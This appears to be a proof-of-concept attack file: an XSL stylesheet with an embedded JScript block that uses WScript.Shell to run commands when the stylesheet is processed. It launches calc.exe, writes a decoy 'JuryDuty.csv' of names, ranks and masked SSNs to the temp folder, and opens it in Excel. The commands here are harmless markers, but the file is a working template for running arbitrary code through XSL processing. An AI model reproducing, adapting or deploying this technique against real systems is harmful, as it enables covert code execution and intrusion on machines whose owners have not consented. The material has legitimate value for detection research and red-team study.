<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
	<ms:script implements-prefix="user" language="JScript">
	<![CDATA[
	var r = new ActiveXObject("WScript.Shell").Run("calc.exe", 0, true);
	var r = new ActiveXObject("WScript.Shell").Run("cmd /c echo Name,Rank,SSN >> %localappdata%\\temp\\JuryDuty.csv", 0, true);
	var r = new ActiveXObject("WScript.Shell").Run("cmd /c echo Sellman A. W.,SrA,***-**-9346 >> %localappdata%\\temp\\JuryDuty.csv", 0, true);
	var r = new ActiveXObject("WScript.Shell").Run("cmd /c echo Xavier Z.,SMSgt,***-**-8827 >> %localappdata%\\temp\\JuryDuty.csv", 0, true);
	var r = new ActiveXObject("WScript.Shell").Run("cmd /c echo Lewis B. C.,MSgt,***-**-2780 >> %localappdata%\\temp\\JuryDuty.csv", 0, true);
	var r = new ActiveXObject("WScript.Shell").Run("cmd /c echo Poore M. A.,TSgt,***-**-2429 >> %localappdata%\\temp\\JuryDuty.csv", 0, true);
	var r = new ActiveXObject("WScript.Shell").Run("cmd /c start excel.exe %localappdata%\\temp\\JuryDuty.csv", 0, true);
	]]> </ms:script>
</stylesheet>